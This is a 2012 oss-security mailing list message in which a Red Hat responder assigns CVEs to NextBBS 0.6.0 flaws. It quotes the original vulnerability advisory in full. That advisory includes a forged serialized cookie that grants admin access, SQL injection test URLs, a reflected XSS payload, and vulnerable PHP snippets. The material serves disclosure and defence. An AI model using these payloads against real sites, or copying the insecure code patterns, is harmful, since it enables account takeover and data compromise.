|
Message-ID: <4F750DC1.4070801@redhat.com> Date: Thu, 29 Mar 2012 19:34:57 -0600 From: Kurt Seifried <kseifried@...hat.com> To: oss-security@...ts.openwall.com CC: Henri Salo <henri@...v.fi>, come2waraxe@...oo.com Subject: Re: CVE-request: NextBBS 0.6.0 waraxe-2012-SA#080 On 03/28/2012 11:34 PM, Henri Salo wrote: > Can I get three 2012 CVEs for NextBBS issues in 0.6.0, thanks. > > 1. user.php Cookie Parsing Authentication Bypass http://osvdb.org/show/osvdb/80626 Please use CVE-2012-1602 for this issue. > 2. ajaxserver.php Multiple Function SQL Injection http://osvdb.org/show/osvdb/80637 (findUsers/isIdAvailable/getGreetings) Please use CVE-2012-1603 for these SQL injection issues. > 3. index.php do Parameter XSS http://osvdb.org/show/osvdb/80627 Please use CVE-2012-1604 for this issue. This makes me sooo happy =) Not just a perfect CVE request but the split/merge of the CVE's is also correct (e.g. 3 SQL injeciton vulns in the same bit of code generally = merge =). > http://packetstormsecurity.org/files/111250/NextBBS-0.6.0-Authentication-Bypass-SQL-Injection-XSS.html > http://www.waraxe.us/advisory-80.html > > Quoting the advisory http://seclists.org/bugtraq/2012/Mar/134 > """ > [waraxe-2012-SA#080] - Multiple Vulnerabilities in NextBBS 0.6.0 > =============================================================================== > > Author: Janek Vind "waraxe" > Date: 27. March 2012 > Location: Estonia, Tartu > Web: http://www.waraxe.us/advisory-80.html > > > Description of vulnerable software: > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > > nextBBS lets you create your own Community with unrivaled ease of use. > Even though the software is highly performant, it doesn't lack any feature > that makes big boards attractive. In fact, it offers the most "Web 2.0" > experience currently available. > > http://sourceforge.net/projects/forums/ > > Vulnerable versions > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > > Affected is NextBBS version 0.6.0, older versions may be vulnerable > as well. > > ############################################################################### > 1. Authentication Bypass in "user.php" > ############################################################################### > > Reason: using unsanitized user submitted data > Attack vector: user submitted cookie > Preconditions: none > Result: attacker can impersonate any user, including admins > > Source code snippet from vulnerable script "user.php": > -----------------[ source code start ]--------------------------------- > // Cookie? > if(isset($_COOKIE[$CONFIG->sessions->name]) || isset($_SESSION[$CONFIG->sessions->name])) > { > .. > if(isset($_COOKIE[$CONFIG->sessions->name])) > { > $scookie = $_COOKIE[$CONFIG->sessions->name]; > .. > $cookie = unserialize(stripslashes($scookie)); > .. > $checkagainst = $this->generatePrivateKey($row['password']); > if($checkagainst == $cookie['userkey']) > { > $_SESSION['ID'] = $uid; > $this->setMember($_SESSION['ID']); > -----------------[ source code end ]----------------------------------- > > As seen above, user submitted cookie will be unserialized and resulting > data is used for authentication. No input data validation exists. > Attacker can use specially crafted cookie, so that after unserializing > variable "$cookie['userkey']" will be boolean "true". > Comparing as "if($checkagainst == $cookie['userkey'])" is insecure and will > always return "true", if "$cookie['userkey']" is boolean "true". > This will allow complete authentication bypass. > > Test: > > Array after serialization: > a:3:{s:3:"uid";s:4:"1219";s:7:"checker";s:1:"1";s:7:"userkey";b:1;} > After urlencoding: > a%3A3%3A%7Bs%3A3%3A%22uid%22%3Bs%3A4%3A%221219%22%3Bs%3A7%3A%22checker%22%3Bs%3A1%3A%221%22%3Bs%3A7%3A%22userkey%22%3Bb%3A1%3B%7D > Cookie: > nextBBS=a%3A3%3A%7Bs%3A3%3A%22uid%22%3Bs%3A4%3A%221219%22%3Bs%3A7%3A%22checker%22%3Bs%3A1%3A%221%22%3Bs%3A7%3A%22userkey%22%3Bb%3A1%3B%7D; > > > Now we will use Firefox with "Tamper Data" extension for easy cookie manipulation. > Let's open page in unauthenticated state and with crafted cookie: > > http://localhost/nextbbs.0.6.0/ > > Result: "Welcome back, waraxe. (Log out?) (Admin CP)" > > We have admin level access now, as expected. > > ############################################################################### > 2. SQL Injection in "ajaxserver.php" function "findUsers" > ############################################################################### > > Reason: using unsanitized user submitted data in SQL queries > Attack vector: user submitted GET parameter "curstr" > Preconditions: none > Result: attacker can manipulate database queries > > Source code snippet from vulnerable script "ajaxserver.php": > -----------------[ source code start ]--------------------------------- > function findUsers($method) > { > global $INPUT, $CONFIG, $DB; > > $filter = urldecode($INPUT['curstr']); > $retstr = ''; > $qry = "SELECT userid FROM {$CONFIG->dbprfx}users > WHERE server='{$CONFIG->server}' AND userid like '".$filter."%'"; > $res = $DB->query($qry); > -----------------[ source code end ]----------------------------------- > > As seen above, user submitted GET parameter "curstr" is urldecoded and > afterwards used in SQL query without proper sanitization. By using urlencoded > single quotes it is possible to conduct SQL injection atttacks. > > Test: > > http://localhost/nextbbs.0.6.0/?do=ajaxserver&action=findusers&curstr=war%2527axe > > Result: > > SQL Layer Error: You have an error in your SQL syntax; check the manual > that corresponds to your MySQL server version for the right syntax to use > near 'axe%'' at line 1 > Query [SELECT userid FROM bb_users WHERE server='1' AND userid like 'war'axe%'] > > > ############################################################################### > 3. SQL Injection in "ajaxserver.php" function "isIdAvailable" > ############################################################################### > > Reason: using unsanitized user submitted data in SQL queries > Attack vector: user submitted GET parameter "id" > Preconditions: none > Result: attacker can manipulate database queries > > Source code snippet from vulnerable script "ajaxserver.php": > -----------------[ source code start ]--------------------------------- > function isIdAvailable($method) > { > global $INPUT, $CONFIG, $DB; > > $filter = urldecode($INPUT['id']); > $qry = "SELECT COUNT(*) as c FROM {$CONFIG->dbprfx}users > WHERE server='{$CONFIG->server}' AND userid ='".$filter."'"; > $res = $DB->query($qry); > -----------------[ source code end ]----------------------------------- > > As seen above, user submitted GET parameter "id" is urldecoded and > afterwards used in SQL query without proper sanitization. By using urlencoded > single quotes it is possible to conduct SQL injection atttacks. > > Test: > > http://localhost/nextbbs.0.6.0/?do=ajaxserver&action=isidavailable&id=war%2527axe > > Result: > > SQL Layer Error: You have an error in your SQL syntax; check the manual > that corresponds to your MySQL server version for the right syntax to use > near 'axe'' at line 1 > Query [SELECT COUNT(*) as c FROM bb_users WHERE server='1' AND userid ='war'axe'] > > > ############################################################################### > 4. SQL Injection in "ajaxserver.php" function "getGreetings" > ############################################################################### > > Reason: using unsanitized user submitted data in SQL queries > Attack vector: user submitted GET parameter "username" > Preconditions: none > Result: attacker can manipulate database queries > > Source code snippet from vulnerable script "ajaxserver.php": > -----------------[ source code start ]--------------------------------- > function getGreetings($method) > { > global $INPUT, $CONFIG, $DB; > > $username = urldecode($INPUT['username']); > $qry = "SELECT text FROM {$CONFIG->dbprfx}greetings g JOIN > {$CONFIG->dbprfx}users u ON (g.dest_id=u.user_ID) > WHERE g.server='{$CONFIG->server}' AND > u.userid='{$username}' AND g.folder_id='1'"; > $res = $DB->query($qry); > -----------------[ source code end ]----------------------------------- > > As seen above, user submitted GET parameter "username" is urldecoded and > afterwards used in SQL query without proper sanitization. By using urlencoded > single quotes it is possible to conduct SQL injection atttacks. > > Test: > > http://localhost/nextbbs.0.6.0/?do=ajaxserver&action=getgreetings&username=war%2527axe > > Result: > > SQL Layer Error: You have an error in your SQL syntax; check the manual > that corresponds to your MySQL server version for the right syntax to use > near 'axe' AND g.folder_id='1'' at line 1 > Query [SELECT text FROM bb_greetings g JOIN bb_users u ON (g.dest_id=u.user_ID) > WHERE g.server='1' AND u.userid='war'axe' AND g.folder_id='1'] > > > ############################################################################### > 5. Reflected XSS in anti-hack measures > ############################################################################### > > Reason: using unsanitized user submitted data in outputted html > Attack vector: user submitted URI > Remarks: XSS payload max length is limited > > Test: > > http://localhost/nextbbs.0.6.0/index.php?do=<body+onload=alert(document.cookie);> > > Response page shows warning: > > "Note: A hack attempt was detected. > It is being logged and reported to the admin along with your IP address:" > > At the same time XSS payload execution can be observed. > > > Contact: > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > > come2waraxe () yahoo com > Janek Vind "waraxe" > """ > > - Henri Salo -- Kurt Seifried Red Hat Security Response Team (SRT)
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.